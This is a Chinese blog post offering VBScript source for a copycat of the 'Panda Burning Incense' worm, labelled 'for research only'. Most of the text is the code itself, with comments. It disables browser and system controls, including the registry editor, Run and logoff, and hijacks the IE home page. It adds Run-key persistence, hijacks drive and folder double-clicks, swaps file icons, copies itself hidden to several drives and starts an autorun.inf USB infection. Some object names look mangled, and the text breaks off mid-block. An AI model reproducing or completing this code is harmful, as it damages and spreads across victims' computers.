熊猫烧香病毒vbs版本仅供研究

最新推荐文章于 2024-08-02 21:59:43 发布

hefenghhhh

最新推荐文章于 2024-08-02 21:59:43 发布

阅读量6.7k

点赞数 6

分类专栏： Linux VBS 文章标签： c search url internet system dll

VBS 同时被 2 个专栏收录

19 篇文章 1 订阅

订阅专栏

Linux

3 篇文章 0 订阅

订阅专栏

dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=w.createobject("w.shell")
set fso=w.createobject("ing.filesystemobject")
set myfile=fso.GetFile(w.fullname)
'修改注册表（开始菜单里面的东西和IE各项设置)
wsh.Regwrite "HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/History",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Start Page","http://baidu.com"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Search Page","http://baidu.com"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Default_Page_URL","http://baidu.com"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Default_Search_URL","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Start Page","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Default_Page_URL","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Default_Search_URL","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Search Page","http://baidu.com"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Infodelivery/Restrictions/NoAddingSubions",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/WinOldApp/NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Run/Win32system","c:/NYboy.vbs"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Run/ScanRegistry",""
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/System/DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/WinOldApp/Disabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘，这里还可以修改为使其不能通过双击打开文件夹，同理，不赘续
wsh.Regwrite "HKLM/SOFTWARE/Classes/Drive/shell/auto/command/","C:/NYboy.bat '%1'"
wsh.Regwrite "HKCR/Drive/shell/","auto"
wsh.Regwrite "HKCR/Drive/shell/auto/command/","C:/NYboy.bat '%1'"
wsh.Regwrite "HKLM/SOFTWARE/Classes/Directory/shell/","auto"
wsh.Regwrite "HKCR/Directory/shell/auto/command/","C:/NYboy.bat '%1'"
wsh.Regwrite "HKLM/SOFTWARE/Classes/Directory/shell/auto/command/","C:/NYboy.bat '%1'"
'修改默认文件图标，这里可以换成可爱的熊猫哦，（修改dll也可以实现，只是有点难）
wsh.Regwrite "HKCR/exefile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/txtfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/dllfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/batfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/inifile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/exefile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/txtfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/dllfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/batfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/inifile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/Software/CLASSES/.reg/","txtfile"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeCaption","你好啊，狂野少年和你开个小小的玩笑"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeText","你已经中毒了，赶快杀毒"
'复制自身到C,D,E,F,U盘
myfile.copy "c:/"
myfile.copy "D:/"
myfile.copy "E:/"
myfile.copy "F:/"
myfile.copy "I:/"
myfile.attributes=34
'定义Autorun.inf 的内容　这个就是u盘病毒必须的代码部分　这里可以简单写哦^_^
If fso.FileExists("C:/autorun.inf") Then
Set objFolder = fso.GetFile("C:/autorun.inf")
Else